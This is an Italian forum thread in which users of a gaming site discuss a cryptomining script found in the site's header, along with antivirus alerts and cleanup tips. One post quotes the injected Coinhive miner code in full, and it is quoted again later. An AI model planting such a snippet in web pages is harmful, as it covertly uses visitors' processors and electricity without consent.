Re: Topic di segnalazione problemi tecnici
Citazione:
Originariamente Scritto da
GeeGeeOH
Non era saltato fuori che lo faceva anche piratebay o altro sito di torrent?
Non mi sono informato a riguardo :pippotto: ma se sono arrivati a farlo su un sito come questo nato da "appena" due anni, sarà una cosa diffusa da tempo. Solo che non avevo idea fossero arrivati "a tanto" :bua:
Sì, i bitcoin miner esistono da un sacco di tempo. Di per sè innocui per il sistema ma, quando il proprietario li fa girare su macchine non sue, ruba risorse e corrente elettrica agli altri.
Citazione:
TizN
Sì, i bitcoin miner esistono da un sacco di tempo. Di per sè innocui per il sistema ma, quando il proprietario li fa girare su macchine non sue, ruba risorse e corrente elettrica agli altri.
A quello mi riferivo :snob:
Citazione:
Smasher_Devourer
Congratulazioni a chi c'ha provato :asd:
E gli auguro una gioiosa settimana sul cesso in preda alla diarrea fulminante.
Come si leva sto schifo? A me malwarebyte sta bloccando sto miner che usa Chrome per tentare di connettersi chissà dove, anche a browser chiuso.
Citazione:
Kikko
No, non serve. Era uno script semplicissimo di poche righe, nascosto nel header. Nulla che installi robe in giro, insomma.
A me invece l'ha fatto visto che fino a ieri sera il problema persisteva.
Per ora disinstallando Chrome malwarebyte non mi segnala più questi tentativi di connessione ma sto browser serve a mia moglie per lavoro quindi devo risolvere questo problema, oltre al fatto che a prescindere non voglio sta merda in giro nel mio pc
Suggerimenti?
ublock e script bloccati :uhm:
Citazione:
Lo Zio
ublock e script bloccati :uhm:
Bloccando non elimina il problema, io voglio estirpare sto malware che sicuramente si è annidato nel sistema, perchè se prova a connettersi anche a Chrome chiuso non è un semplice problema di script in un sito web
Citazione:
freddye78
A me invece l'ha fatto visto che fino a ieri sera il problema persisteva.
Lo script era un semplicissimo miner recaller, ovvero questo:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('fjYTY26J3ifKy639AQh8UpQs0zHjMk fR');
miner.start();
</script>
Come può essere che ti abbia installato roba?
Citazione:
freddye78
E gli auguro una gioiosa settimana sul cesso in preda alla diarrea fulminante.
Come si leva sto schifo? A me malwarebyte sta bloccando sto miner che usa Chrome per tentare di connettersi chissà dove, anche a browser chiuso.
Non era stato detto che non scaricava nulla?
Mi stai dicendo che sono impestato e non lo sapevo?
Inviato dal mio p9 lite utilizzando Tapatalk
Citazione:
freddye78
Bloccando non elimina il problema, io voglio estirpare sto malware che sicuramente si è annidato nel sistema, perchè se prova a connettersi anche a Chrome chiuso non è un semplice problema di script in un sito web
Malawarebytes cosa ti segnala di preciso?
Citazione:
freddye78
allora è un problema diverso dallo script :uhm:
Citazione:
freddye78
Direi che è altro.
Citazione:
Kikko
Lo script era un semplicissimo miner recaller, ovvero questo:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('fjYTY26J3ifKy639AQh8UpQs0zHjMk fR');
miner.start();
</script>
Come può essere che ti abbia installato roba?
Eh questo è, altrimenti non tenterebbe di connettersi anche a browser chiuso.
Citazione:
Kikko
Malawarebytes cosa ti segnala di preciso?
Tentativi di connessione a coinhive.com con ip diversi tramite chrome.exe, anche a browser chiuso.
Citazione:
Lo Zio
allora è un problema diverso dallo script :uhm:
Eh appunto, a me è stata iniettata della merda nel pc, e non può essere un caso che mi sia capitato poco dopo che il problema è stato rilevato qui e per di più il miner è il medesimo.
Secondo me non l'hai preso dal sito di tgm. Perché sembra che tu sia l'unico con questo problema, altrimenti dovremmo averlo tutti. Usa un antivirus su tutto il sistema
a me ha dato problema la notte che ho lasciato acceso su tgm. al mattino l'ho trovato bello caldo con la geforce che girava e poi ho visto sto coinhive.
Ccleaner per togliere tutti i file temporanei, poi pare l'abbian tolto da tgm e non mi andava piu'. Fatto un giro di malwarebytes + 360 internet security e non ha rilevato nulla.
Sembra risolto
Citazione:
freddye78
Eh appunto, a me è stata iniettata della merda nel pc, e non può essere un caso che mi sia capitato poco dopo che il problema è stato rilevato qui e per di più il miner è il medesimo.
Non hai in background qualche programma cazzuto che si tiene a mente roba cache di Chrome, e che quindi ha inoculato lo script?
sento puzza di chrome merda
pulisci tutta la roba temporanea